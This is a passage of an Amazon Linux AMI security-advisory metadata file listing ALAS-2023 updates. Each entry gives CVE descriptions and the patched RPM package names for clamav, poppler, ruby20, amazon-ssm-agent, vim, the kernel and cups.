arch="i686"><filename>Packages/kernel-debuginfo-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.322-170.538.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1820</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1820: important priority package update for clamav</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-20197:
A vulnerability in the filesystem image parser for Hierarchical File System Plus (HFS+) of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to an incorrect check for completion when a file is decompressed, which may result in a loop condition that could cause the affected software to stop responding. An attacker could exploit this vulnerability by submitting a crafted HFS+ filesystem image to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to stop responding, resulting in a DoS condition on the affected software and consuming available system resources.
For a description of this vulnerability, see the ClamAV blog.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20197" title="" id="CVE-2023-20197" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamd" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.103.9" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.103.9-1.55.amzn1.noarch.rpm</filename></package><package name="clamav" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.103.9" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.103.9-1.55.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-db" 
version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamd" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.103.9-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1821</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1821: medium priority package update for poppler</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37050:
In Poppler 22.07.0, PDFDoc::savePageAs in PDFDoc.cc allows attackers to cause a denial-of-service (application crashes with SIGABRT) by crafting a PDF file in which the xref data structure is mishandled in getCatalog processing. Note that this vulnerability is caused by the incomplete patch of CVE-2018-20662.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37050" title="" id="CVE-2022-37050" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-glib-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1823</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1823: medium priority package update for poppler</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-18839:
Buffer Overflow vulnerability in HtmlOutputDev::page in poppler 0.75.0 allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-18839" title="" id="CVE-2020-18839" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1824</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1824: medium priority package update for ruby20</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9224:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9224" title="" id="CVE-2017-9224" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem20-io-console" version="0.4.2" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.42.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.42.amzn1.noarch.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.42.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.42.amzn1.noarch.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.42.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.42.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.42.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.42.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.42.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.42.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.42.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.42.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1825</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1825: important priority package update for amazon-ssm-agent</title><issued date="2023-08-30 18:41:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
CVE-2022-27664:
In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.
CVE-2022-27191:
A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.
CVE-2021-43565:
The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43565" title="" id="CVE-2021-43565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27191" title="" id="CVE-2022-27191" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664" title="" id="CVE-2022-27664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.2.1377.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.2.1377.0-1.amzn1.x86_64.rpm</filename></package><package name="amazon-ssm-agent-debuginfo" version="3.2.1377.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-debuginfo-3.2.1377.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1826</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1826: important priority package update for vim</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4781:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1873.
CVE-2023-4751:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1331.
CVE-2023-4738:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1848.
CVE-2023-4735:
Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1847.
CVE-2023-4734:
Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1846.
CVE-2021-3236:
vim 8.2.2348 is affected by a null pointer dereference that allows local attackers to cause a denial of service (DoS) via the ex_buffer_all method.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3236" title="" id="CVE-2021-3236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4734" title="" id="CVE-2023-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4735" title="" id="CVE-2023-4735" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4738" title="" id="CVE-2023-4738" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4751" title="" id="CVE-2023-4751" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4781" title="" id="CVE-2023-4781" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1712-1.82.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1712-1.82.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.82.amzn1" epoch="2" 
arch="x86_64"><filename>Packages/vim-enhanced-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1712-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1827</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1827: important priority package update for kernel</title><issued date="2023-09-13 23:15:00" /><updated date="2025-02-27 23:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-0639:
A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel's SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.
CVE-2023-52885:
In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Fix UAF in svc_tcp_listen_data_ready()
CVE-2023-4208:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.
When u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.
We recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.
CVE-2023-4206:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.
When route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.
We recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.
CVE-2023-4128:
A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.
CVE-2023-34319:
The fix for XSA-423 added logic to Linux's netback driver to deal with
a frontend splitting a packet in a way such that not all of the headers
would come in one piece. Unfortunately the logic introduced there
didn't account for the extreme case of the entire packet being split
into as many pieces as permitted by the protocol, yet still being
smaller than the area that's specially dealt with to keep all (possible)
headers together. Such an unusual packet would therefore trigger a
buffer overrun in the driver.
CVE-2023-3390:
A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.
Mishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.
We recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3390" title="" id="CVE-2023-3390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34319" title="" id="CVE-2023-34319" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4128" title="" id="CVE-2023-4128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4206" title="" id="CVE-2023-4206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4208" title="" id="CVE-2023-4208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52885" title="" id="CVE-2023-52885" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0639" title="" id="CVE-2024-0639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.322" release="170.535.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1828</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1828: medium priority package update for cups</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32360:
An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. An unauthenticated user may be able to access recently printed documents.
